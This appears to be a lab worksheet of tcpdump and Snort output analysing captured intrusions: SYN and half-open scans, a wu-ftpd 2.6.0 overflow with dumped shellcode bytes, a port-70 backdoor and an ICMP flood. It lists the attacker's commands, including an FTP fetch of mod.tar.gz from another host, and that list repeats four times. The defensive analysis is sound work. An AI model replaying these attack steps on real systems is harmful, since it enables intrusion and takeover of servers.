TCPDUMP files analysis ====================== 011021200 tcpdump -r 0011021200 port 25 show some scanning from ntec20 and then normal anonymous ftp from ntec20 *** please identify what type of scanning for me and record down it in your report Give evidence for that (dump packets in your report) *** snort -dCvr 0011021200 'tcp[13] & 8 !=0' and dst ntec81 | gfilter show anonymous ftp from ntec20 mkdir /tmp/alog snort -oder 0011021200 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog /tmp/alog/portscan.log show syn scan from 192.168.64.20 (ntec20): Nov 2 12:03:57 192.168.64.20:1374 -> 192.168.128.81:260 SYN ******S* Nov 2 12:03:57 192.168.64.20:1375 -> 192.168.128.81:1539 SYN ******S* Nov 2 12:03:57 192.168.64.20:1376 -> 192.168.128.81:629 SYN ******S* Nov 2 12:03:57 192.168.64.20:1377 -> 192.168.128.81:938 SYN ******S* Nov 2 12:03:57 192.168.64.20:1378 -> 192.168.128.81:766 SYN ******S* Nov 2 12:03:57 192.168.64.20:1379 -> 192.168.128.81:821 SYN ******S* Nov 2 12:03:57 192.168.64.20:1380 -> 192.168.128.81:461 SYN ******S* Nov 2 12:03:57 192.168.64.20:1381 -> 192.168.128.81:797 SYN ******S* Nov 2 12:03:57 192.168.64.20:1382 -> 192.168.128.81:937 SYN ******S* ... snort -oder 0011021445 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog tmp/alog/portscan.log show syn scan from 192.168.64.23: Nov 2 14:54:42 192.168.64.23:4769 -> 192.168.128.81:1103 SYN ******S* Nov 2 14:54:42 192.168.64.23:4770 -> 192.168.128.81:138 SYN ******S* Nov 2 14:54:42 192.168.64.23:4771 -> 192.168.128.81:126 SYN ******S* Nov 2 14:54:42 192.168.64.23:4772 -> 192.168.128.81:503 SYN ******S* tcpdump -r 0011021500 port 25 15:07:44.908245 ntec9-38.52264 > ntec81.smtp: S 4232288827:4232288827(0) win 2048 15:07:44.908319 ntec81.smtp > ntec9-38.52264: S 362888347:362888347(0) ack 4232288828 win 31624 (DF) 15:07:44.908534 ntec9-38.52264 > ntec81.smtp: R 4232288828:4232288828(0) win 0 shows half-sync scan tcpdump -r 0011021630 port 25 16:36:37.766947 ntec10-38.43217 > ntec81.smtp: S 2014313259:2014313259(0) win 2048 16:36:37.767015 ntec81.smtp > ntec10-38.43217: S 1703337482:1703337482(0) ack 2014313260 win 31624 (DF) 16:36:37.767167 ntec10-38.43217 > ntec81.smtp: R 2014313260:2014313260(0) win 0 0011021645 directory snort -dCvr 0011021645 'tcp[13] & 8 !=0' and dst ntec81 | gfilter | more 11/02-16:49:45.256116 192.168.128.94:1096 -> 192.168.128.81:79 .. 11/02-16:50:14.376004 192.168.128.94:1097 -> 192.168.128.81:21 USER ftp.. 11/02-16:50:14.377822 192.168.128.94:1097 -> 192.168.128.81:21 PASS ........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................1.1.1..F..1.1.C..A.?...k^1.1..^. .F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0 ...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11.. shows ftp attack snort -oder 0011021645 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog the /tmp/alog/alert shows [**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 11/02-16:50:14.377822 0:D0:9:2D:6F:3 -> 0:D0:9:28:97:E6 type:0x800 len:0x23C 192.168.128.94:1097 -> 192.168.128.81:21 TCP TTL:64 TOS:0x0 ID:59488 IpLen:20 DgmLen:558 DF ***AP*** Seq: 0x981E5A02 Ack: 0x99C00CF3 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 933502437 10851767 [Xref => http://www.whitehats.com/info/IDS287] [**] [1:648:4] SHELLCODE x86 NOOP [**] [Classification: Executable code was detected] [Priority: 1] 11/02-16:55:38.289920 0:D0:9:28:97:E6 -> 0:D0:9:2D:6F:3 type:0x800 len:0x5EA 192.168.128.81:21 -> 192.168.128.94:1100 TCP TTL:64 TOS:0x10 ID:6082 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0xA8B09DF0 Ack: 0xA7AB20B2 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 10884161 933534831 [Xref => http://www.whitehats.com/info/IDS181] in 0011021700-dir snort -dCvr 0011021700 'tcp[13] & 8 !=0' and dst ntec81 | gfilter 11/02-17:01:28.611403 192.168.128.94:1104 -> 192.168.128.81:21 PASS ........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................1.1.1..F..1.1.C..A.?...k^1.1..^. .F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0 ...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11.. show the attack from 192.168.128.94 snort -oder 0011021700 -c /usr/local2/etc/snort/snort.conf -l /tmp/alog [**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 11/02-17:01:28.611403 0:D0:9:2D:6F:3 -> 0:D0:9:28:97:E6 type:0x800 len:0x23C 192.168.128.94:1104 -> 192.168.128.81:21 TCP TTL:64 TOS:0x0 ID:1343 IpLen:20 DgmLen:558 DF ***AP*** Seq: 0xC3B1CC24 Ack: 0xC3B55385 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 933569865 10919196 [Xref => http://www.whitehats.com/info/IDS287] Please list out what commands did the hacker execute at that time. /bin/uname -a;/usr/bin/id;. whoami hostname cd /usr/lib ftp ntec94. user tuser 12345678. cd /tmp get mod.tar.gz. Please list out what commands did the hacker execute at that time. /bin/uname -a;/usr/bin/id;. whoami hostname cd /usr/lib ftp ntec94. user tuser 12345678. cd /tmp get mod.tar.gz. Please list out what commands did the hacker execute at that time. /bin/uname -a;/usr/bin/id;. whoami hostname cd /usr/lib ftp ntec94. user tuser 12345678. cd /tmp get mod.tar.gz. Please list out what commands did the hacker execute at that time. /bin/uname -a;/usr/bin/id;. whoami hostname cd /usr/lib ftp ntec94. user tuser 12345678. cd /tmp get mod.tar.gz. .. snort -dCvr 0011021745 'tcp[13] & 8 !=0' and dst ntec81 | gfilter | more 11/02-17:45:22.507733 192.168.128.94:1111 -> 192.168.128.81:70 ps -ef.. 11/02-17:45:24.372239 192.168.128.94:1111 -> 192.168.128.81:70 ps -aux.. 11/02-17:46:26.101327 192.168.128.94:1111 -> 192.168.128.81:70 pwd.. 11/02-17:46:29.013348 192.168.128.94:1111 -> 192.168.128.81:70 cd /usr/lib/src.. the backdoor should be on port 70 in 0011022200-dir tcpdump -nr 0011022200 | more 22:01:46.288718 235.116.33.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.288810 37.54.66.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.288902 84.232.73.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.288993 241.75.127.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.289085 229.60.192.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.289178 37.20.181.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.289270 25.31.202.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.289362 177.70.98.0 > 192.168.128.50: icmp: echo request [ttl 0] 22:01:46.289456 215.108.211.0 > 192.168.128.50: icmp: echo request [ttl 0] ICMP flood attack to 192.168.128.50